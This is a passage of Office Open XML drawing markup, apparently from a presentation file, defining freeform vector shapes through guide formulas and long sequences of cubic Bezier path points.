                <a:gd name="T11" fmla="*/ 396 h 469"/>
                <a:gd name="T12" fmla="*/ 140 w 449"/>
                <a:gd name="T13" fmla="*/ 396 h 469"/>
                <a:gd name="T14" fmla="*/ 4 w 449"/>
                <a:gd name="T15" fmla="*/ 214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9" h="469">
                  <a:moveTo>
                    <a:pt x="4" y="214"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="102"/>
                    <a:pt x="97" y="8"/>
                    <a:pt x="219" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="0"/>
                    <a:pt x="443" y="88"/>
                    <a:pt x="446" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="449" y="295"/>
                    <a:pt x="382" y="376"/>
                    <a:pt x="288" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="444"/>
                    <a:pt x="313" y="469"/>
                    <a:pt x="313" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="459"/>
                    <a:pt x="140" y="396"/>
                    <a:pt x="140" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="396"/>
                    <a:pt x="140" y="396"/>
                    <a:pt x="140" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="366"/>
                    <a:pt x="6" y="297"/>
                    <a:pt x="4" y="2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43" name="Freeform 1107">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F47035E6-9429-42EA-9E04-8D76C30E29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62099" y="2743200"/>
              <a:ext cx="688975" cy="719137"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 9 w 411"/>
                <a:gd name="T1" fmla="*/ 165 h 428"/>
                <a:gd name="T2" fmla="*/ 211 w 411"/>
                <a:gd name="T3" fmla="*/ 0 h 428"/>
                <a:gd name="T4" fmla="*/ 332 w 411"/>
                <a:gd name="T5" fmla="*/ 415 h 428"/>
                <a:gd name="T6" fmla="*/ 370 w 411"/>
                <a:gd name="T7" fmla="*/ 402 h 428"/>
                <a:gd name="T8" fmla="*/ 375 w 411"/>
                <a:gd name="T9" fmla="*/ 367 h 428"/>
                <a:gd name="T10" fmla="*/ 296 w 411"/>
                <a:gd name="T11" fmla="*/ 365 h 428"/>
                <a:gd name="T12" fmla="*/ 411 w 411"/>
                <a:gd name="T13" fmla="*/ 327 h 428"/>
                <a:gd name="T14" fmla="*/ 349 w 411"/>
                <a:gd name="T15" fmla="*/ 324 h 428"/>
                <a:gd name="T16" fmla="*/ 376 w 411"/>
                <a:gd name="T17" fmla="*/ 307 h 428"/>
                <a:gd name="T18" fmla="*/ 331 w 411"/>
                <a:gd name="T19" fmla="*/ 305 h 428"/>
                <a:gd name="T20" fmla="*/ 352 w 411"/>
                <a:gd name="T21" fmla="*/ 299 h 428"/>
                <a:gd name="T22" fmla="*/ 342 w 411"/>
                <a:gd name="T23" fmla="*/ 303 h 428"/>
                <a:gd name="T24" fmla="*/ 322 w 411"/>
                <a:gd name="T25" fmla="*/ 296 h 428"/>
                <a:gd name="T26" fmla="*/ 322 w 411"/>
                <a:gd name="T27" fmla="*/ 327 h 428"/>
                <a:gd name="T28" fmla="*/ 269 w 411"/>
                <a:gd name="T29" fmla="*/ 323 h 428"/>
                <a:gd name="T30" fmla="*/ 303 w 411"/>
                <a:gd name="T31" fmla="*/ 314 h 428"/>
                <a:gd name="T32" fmla="*/ 240 w 411"/>
                <a:gd name="T33" fmla="*/ 294 h 428"/>
                <a:gd name="T34" fmla="*/ 336 w 411"/>
                <a:gd name="T35" fmla="*/ 268 h 428"/>
                <a:gd name="T36" fmla="*/ 338 w 411"/>
                <a:gd name="T37" fmla="*/ 257 h 428"/>
                <a:gd name="T38" fmla="*/ 327 w 411"/>
                <a:gd name="T39" fmla="*/ 234 h 428"/>
                <a:gd name="T40" fmla="*/ 325 w 411"/>
                <a:gd name="T41" fmla="*/ 215 h 428"/>
                <a:gd name="T42" fmla="*/ 355 w 411"/>
                <a:gd name="T43" fmla="*/ 178 h 428"/>
                <a:gd name="T44" fmla="*/ 388 w 411"/>
                <a:gd name="T45" fmla="*/ 104 h 428"/>
                <a:gd name="T46" fmla="*/ 375 w 411"/>
                <a:gd name="T47" fmla="*/ 52 h 428"/>
                <a:gd name="T48" fmla="*/ 294 w 411"/>
                <a:gd name="T49" fmla="*/ 22 h 428"/>
                <a:gd name="T50" fmla="*/ 285 w 411"/>
                <a:gd name="T51" fmla="*/ 18 h 428"/>
                <a:gd name="T52" fmla="*/ 233 w 411"/>
                <a:gd name="T53" fmla="*/ 13 h 428"/>
                <a:gd name="T54" fmla="*/ 231 w 411"/>
                <a:gd name="T55" fmla="*/ 7 h 428"/>
                <a:gd name="T56" fmla="*/ 229 w 411"/>
                <a:gd name="T57" fmla="*/ 7 h 428"/>
                <a:gd name="T58" fmla="*/ 167 w 411"/>
                <a:gd name="T59" fmla="*/ 28 h 428"/>
                <a:gd name="T60" fmla="*/ 213 w 411"/>
                <a:gd name="T61" fmla="*/ 5 h 428"/>
                <a:gd name="T62" fmla="*/ 208 w 411"/>
                <a:gd name="T63" fmla="*/ 5 h 428"/>
                <a:gd name="T64" fmla="*/ 193 w 411"/>
                <a:gd name="T65" fmla="*/ 4 h 428"/>
                <a:gd name="T66" fmla="*/ 173 w 411"/>
                <a:gd name="T67" fmla="*/ 8 h 428"/>
                <a:gd name="T68" fmla="*/ 44 w 411"/>
                <a:gd name="T69" fmla="*/ 177 h 428"/>
                <a:gd name="T70" fmla="*/ 95 w 411"/>
                <a:gd name="T71" fmla="*/ 203 h 428"/>
                <a:gd name="T72" fmla="*/ 83 w 411"/>
                <a:gd name="T73" fmla="*/ 69 h 428"/>
                <a:gd name="T74" fmla="*/ 123 w 411"/>
                <a:gd name="T75" fmla="*/ 50 h 428"/>
                <a:gd name="T76" fmla="*/ 135 w 411"/>
                <a:gd name="T77" fmla="*/ 30 h 428"/>
                <a:gd name="T78" fmla="*/ 73 w 411"/>
                <a:gd name="T79" fmla="*/ 67 h 428"/>
                <a:gd name="T80" fmla="*/ 359 w 411"/>
                <a:gd name="T81" fmla="*/ 41 h 428"/>
                <a:gd name="T82" fmla="*/ 297 w 411"/>
                <a:gd name="T83" fmla="*/ 29 h 428"/>
                <a:gd name="T84" fmla="*/ 360 w 411"/>
                <a:gd name="T85" fmla="*/ 61 h 428"/>
                <a:gd name="T86" fmla="*/ 69 w 411"/>
                <a:gd name="T87" fmla="*/ 68 h 428"/>
                <a:gd name="T88" fmla="*/ 78 w 411"/>
                <a:gd name="T89" fmla="*/ 78 h 428"/>
                <a:gd name="T90" fmla="*/ 38 w 411"/>
                <a:gd name="T91" fmla="*/ 102 h 428"/>
                <a:gd name="T92" fmla="*/ 33 w 411"/>
                <a:gd name="T93" fmla="*/ 134 h 428"/>
                <a:gd name="T94" fmla="*/ 42 w 411"/>
                <a:gd name="T95" fmla="*/ 159 h 428"/>
                <a:gd name="T96" fmla="*/ 52 w 411"/>
                <a:gd name="T97" fmla="*/ 172 h 428"/>
                <a:gd name="T98" fmla="*/ 331 w 411"/>
                <a:gd name="T99" fmla="*/ 157 h 428"/>
                <a:gd name="T100" fmla="*/ 372 w 411"/>
                <a:gd name="T101" fmla="*/ 74 h 428"/>
                <a:gd name="T102" fmla="*/ 256 w 411"/>
                <a:gd name="T103" fmla="*/ 21 h 428"/>
                <a:gd name="T104" fmla="*/ 219 w 411"/>
                <a:gd name="T105" fmla="*/ 23 h 428"/>
                <a:gd name="T106" fmla="*/ 201 w 411"/>
                <a:gd name="T107" fmla="*/ 44 h 428"/>
                <a:gd name="T108" fmla="*/ 114 w 411"/>
                <a:gd name="T109" fmla="*/ 216 h 428"/>
                <a:gd name="T110" fmla="*/ 205 w 411"/>
                <a:gd name="T111" fmla="*/ 227 h 428"/>
                <a:gd name="T112" fmla="*/ 289 w 411"/>
                <a:gd name="T113" fmla="*/ 234 h 428"/>
                <a:gd name="T114" fmla="*/ 45 w 411"/>
                <a:gd name="T115" fmla="*/ 92 h 428"/>
                <a:gd name="T116" fmla="*/ 97 w 411"/>
                <a:gd name="T117" fmla="*/ 367 h 428"/>
                <a:gd name="T118" fmla="*/ 6 w 411"/>
                <a:gd name="T119" fmla="*/ 271 h 428"/>
                <a:gd name="T120" fmla="*/ 162 w 411"/>
                <a:gd name="T121" fmla="*/ 9 h 428"/>
                <a:gd name="T122" fmla="*/ 214 w 411"/>
                <a:gd name="T123" fmla="*/ 0 h 428"/>
                <a:gd name="T124" fmla="*/ 200 w 411"/>
                <a:gd name="T125" fmla="*/ 1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1" h="428">
                  <a:moveTo>
                    <a:pt x="14" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="149"/>
                    <a:pt x="14" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="149"/>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="147"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="147"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                    <a:pt x="14" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="15" y="147"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="144"/>
                    <a:pt x="17" y="141"/>
                    <a:pt x="18" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="141"/>
                    <a:pt x="17" y="141"/>
                    <a:pt x="17" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="142"/>
                    <a:pt x="16" y="144"/>
                    <a:pt x="15" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="146"/>
                    <a:pt x="15" y="146"/>
                    <a:pt x="15" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                    <a:pt x="15" y="147"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="16" y="144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="144"/>
                    <a:pt x="16" y="144"/>
                    <a:pt x="16" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="143"/>
                    <a:pt x="16" y="143"/>
                    <a:pt x="16" y="143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1"/>
                    <a:pt x="18" y="139"/>
                    <a:pt x="18" y="138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7" y="141"/>
                    <a:pt x="16" y="144"/>
                    <a:pt x="15" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="146"/>
                    <a:pt x="15" y="145"/>
                    <a:pt x="16" y="144"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="21" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="128"/>
                    <a:pt x="24" y="126"/>
                    <a:pt x="24" y="125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5" y="124"/>
                    <a:pt x="25" y="123"/>
                    <a:pt x="25" y="123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5" y="124"/>
                    <a:pt x="24" y="125"/>
                    <a:pt x="24" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="129"/>
                    <a:pt x="21" y="131"/>
                    <a:pt x="20" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="134"/>
                    <a:pt x="19" y="135"/>
                    <a:pt x="19" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="135"/>
                    <a:pt x="20" y="133"/>
                    <a:pt x="21" y="132"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="5" y="270"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="269"/>
                    <a:pt x="4" y="268"/>
                    <a:pt x="4" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="269"/>
                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="270"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="239"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="241"/>
                    <a:pt x="1" y="242"/>
                    <a:pt x="1" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="245"/>
                    <a:pt x="1" y="245"/>
                    <a:pt x="1" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="244"/>
                    <a:pt x="1" y="242"/>
                    <a:pt x="1" y="239"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="209"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="213"/>
                    <a:pt x="0" y="217"/>
                    <a:pt x="0" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="225"/>
                    <a:pt x="0" y="225"/>
                    <a:pt x="0" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="0" y="215"/>
                    <a:pt x="1" y="209"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="0" y="221"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="225"/>
                    <a:pt x="0" y="225"/>
                    <a:pt x="0" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="221"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="161"/>
                    <a:pt x="10" y="161"/>
                    <a:pt x="10" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="163"/>
                    <a:pt x="9" y="163"/>
                    <a:pt x="9" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="164"/>
                    <a:pt x="9" y="165"/>
                    <a:pt x="9" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="165"/>
                    <a:pt x="9" y="165"/>
                    <a:pt x="9" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="164"/>
                    <a:pt x="10" y="162"/>
                    <a:pt x="10" y="160"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="159"/>
                    <a:pt x="10" y="159"/>
                    <a:pt x="10" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="160"/>
                    <a:pt x="10" y="160"/>
                    <a:pt x="10" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="160"/>
                    <a:pt x="10" y="160"/>
                    <a:pt x="10" y="160"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="0"/>
                    <a:pt x="206" y="0"/>
                    <a:pt x="206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8" y="0"/>
                    <a:pt x="208" y="0"/>
                    <a:pt x="207" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="0"/>
                    <a:pt x="206" y="1"/>
                    <a:pt x="205" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="0"/>
                    <a:pt x="206" y="0"/>
                    <a:pt x="206" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="0"/>
                    <a:pt x="207" y="0"/>
                    <a:pt x="207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06" y="0"/>
                    <a:pt x="206" y="0"/>
                    <a:pt x="206" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="209" y="0"/>
                  </a:move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08" y="0"/>
                    <a:pt x="208" y="0"/>
                    <a:pt x="209" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="209" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="0"/>
                    <a:pt x="209" y="0"/>
                    <a:pt x="209" y="0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211" y="0"/>
                    <a:pt x="211" y="0"/>
                    <a:pt x="210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209" y="0"/>
                    <a:pt x="209" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="210" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="0"/>
                    <a:pt x="210" y="0"/>
                    <a:pt x="210" y="0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0" y="0"/>
                    <a:pt x="210" y="0"/>
                    <a:pt x="210" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="211" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="0"/>
                    <a:pt x="212" y="0"/>
                    <a:pt x="212" y="0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11" y="0"/>
                    <a:pt x="211" y="0"/>
                    <a:pt x="211" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="211" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="0"/>
                    <a:pt x="211" y="0"/>
                    <a:pt x="211" y="0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11" y="0"/>
                    <a:pt x="211" y="0"/>
                    <a:pt x="211" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="212" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="0"/>
                    <a:pt x="212" y="0"/>
                    <a:pt x="212" y="0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212" y="0"/>
                    <a:pt x="212" y="0"/>
                    <a:pt x="212" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="213" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="0"/>
                    <a:pt x="213" y="0"/>
                    <a:pt x="213" y="0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13" y="0"/>
                    <a:pt x="213" y="0"/>
                    <a:pt x="213" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="188" y="276"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="188" y="275"/>
                    <a:pt x="188" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="274"/>
                    <a:pt x="188" y="274"/>
                    <a:pt x="188" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="273"/>
                    <a:pt x="188" y="273"/>
                    <a:pt x="188" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="273"/>
                    <a:pt x="188" y="273"/>
                    <a:pt x="188" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="270"/>
                    <a:pt x="186" y="270"/>
                    <a:pt x="186" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="270"/>
                    <a:pt x="186" y="270"/>
                    <a:pt x="186" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="269"/>
                    <a:pt x="185" y="269"/>
                    <a:pt x="185" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="269"/>
                    <a:pt x="185" y="269"/>
                    <a:pt x="184" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="266"/>
                    <a:pt x="183" y="266"/>
                    <a:pt x="183" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="267"/>
                    <a:pt x="183" y="267"/>
                    <a:pt x="183" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="267"/>
                    <a:pt x="183" y="267"/>
                    <a:pt x="182" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="269"/>
                    <a:pt x="183" y="269"/>
                    <a:pt x="183" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="269"/>
                    <a:pt x="182" y="269"/>
                    <a:pt x="182" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="269"/>
                    <a:pt x="182" y="269"/>
                    <a:pt x="182" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="270"/>
                    <a:pt x="183" y="270"/>
                    <a:pt x="183" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="271"/>
                    <a:pt x="183" y="271"/>
                    <a:pt x="183" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="272"/>
                    <a:pt x="183" y="272"/>
                    <a:pt x="183" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="272"/>
                    <a:pt x="183" y="272"/>
                    <a:pt x="182" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="273"/>
                    <a:pt x="182" y="277"/>
                    <a:pt x="183" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="278"/>
                    <a:pt x="184" y="279"/>
                    <a:pt x="185" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="279"/>
                    <a:pt x="186" y="279"/>
                    <a:pt x="188" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="277"/>
                    <a:pt x="188" y="277"/>
                    <a:pt x="188" y="276"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="328" y="417"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="417"/>
                    <a:pt x="329" y="416"/>
                    <a:pt x="330" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="416"/>
                    <a:pt x="329" y="416"/>
                    <a:pt x="328" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="416"/>
                    <a:pt x="327" y="416"/>
                    <a:pt x="327" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="416"/>
                    <a:pt x="326" y="416"/>
                    <a:pt x="326" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="416"/>
                    <a:pt x="327" y="416"/>
                    <a:pt x="327" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="416"/>
                    <a:pt x="327" y="416"/>
                    <a:pt x="327" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="415"/>
                    <a:pt x="327" y="415"/>
                    <a:pt x="327" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="415"/>
                    <a:pt x="327" y="415"/>
                    <a:pt x="327" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="415"/>
                    <a:pt x="326" y="415"/>
                    <a:pt x="326" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="416"/>
                    <a:pt x="324" y="416"/>
                    <a:pt x="324" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="417"/>
                    <a:pt x="324" y="417"/>
                    <a:pt x="323" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="418"/>
                    <a:pt x="323" y="418"/>
                    <a:pt x="323" y="418"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="418"/>
                    <a:pt x="323" y="418"/>
                    <a:pt x="323" y="418"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="419"/>
                    <a:pt x="323" y="419"/>
                    <a:pt x="323" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="419"/>
                    <a:pt x="322" y="419"/>
                    <a:pt x="322" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="421"/>
                    <a:pt x="321" y="421"/>
                    <a:pt x="321" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="421"/>
                    <a:pt x="321" y="421"/>
                    <a:pt x="321" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="422"/>
                    <a:pt x="321" y="422"/>
                    <a:pt x="321" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="422"/>
                    <a:pt x="321" y="422"/>
                    <a:pt x="321" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="422"/>
                    <a:pt x="321" y="422"/>
                    <a:pt x="321" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="421"/>
                    <a:pt x="322" y="421"/>
                    <a:pt x="323" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="420"/>
                    <a:pt x="323" y="420"/>
                    <a:pt x="323" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="420"/>
                    <a:pt x="324" y="420"/>
                    <a:pt x="324" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="420"/>
                    <a:pt x="325" y="419"/>
                    <a:pt x="325" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="419"/>
                    <a:pt x="326" y="418"/>
                    <a:pt x="327" y="418"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="418"/>
                    <a:pt x="328" y="418"/>
                    <a:pt x="328" y="417"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="332" y="415"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="414"/>
                    <a:pt x="332" y="414"/>
                    <a:pt x="332" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="414"/>
                    <a:pt x="333" y="414"/>
                    <a:pt x="333" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
